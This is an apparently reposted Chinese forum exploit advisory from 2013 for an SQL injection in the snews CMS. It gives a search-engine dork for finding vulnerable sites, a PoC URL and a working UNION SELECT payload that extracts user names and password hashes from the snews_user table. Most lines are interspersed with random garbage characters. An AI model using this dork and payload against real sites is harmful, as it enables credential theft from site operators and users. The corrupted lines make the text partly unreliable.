标题: CMS snews SQL Injection Vulnerability
5 N$ O0 @+ |' V- M1 s作者: By onestree
: y, k3 z: o+ \2 h下载地址 : http://snewscms.com/
6 G4 w, G8 G/ _+ j+ g" |3 x5 S测试平台 : ubuntu 12.10 / win 7
& k; d7 v. _' Q1 O1 K, H1 o关键词: inurl:"tanyakan pada rumput yang bergoyang"
4 `2 b4 g+ o9 J , V8 q- b) A1 I: ~& ^- N* D
" Z U8 G" W3 Q+ w+ ^
*************************************************************2 L" p0 [5 \5 J; U; |% N$ D4 L
( S1 y: [% L' \SQL poc:
9 W( u* S7 C/ ?; ` \
/ |1 @; ]. Q1 d+ B# J1 ]! @) }0 Z2 Vhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]2 X3 c$ V6 ~, J- v* Z# ^7 C- e
6 J& ^% j' N8 c! y1 ~
示例
) n/ d5 r0 \9 g3 U2 R' \5 { " a7 f# B! W4 }( U" _# y
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*$ ` Y4 t' d* S5 |1 ?$ R
3 V' ?* Z9 g: B2 V+ C6 k0 R
3 U( T0 @1 o1 L; `& s致谢:
* v0 W! w- V+ u3 J ! P7 [1 T" D9 b9 l4 k; i% C: R
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell ]. H9 C' ]* v6 x( B+ \- E
, U1 v" H- ?9 v/ e) X5 N. h
indonesiancoder - moeslimh4x0r - go-coder
& ]) \1 d: ~. _+ U
1 [" K/ R* P9 q8 x/ @4 r$ e8 Bspesial my hunny :*1 M2 W+ l d6 G% z" U1 ?
|
发表于 2013-1-23 08:55:06
收藏
支持
反对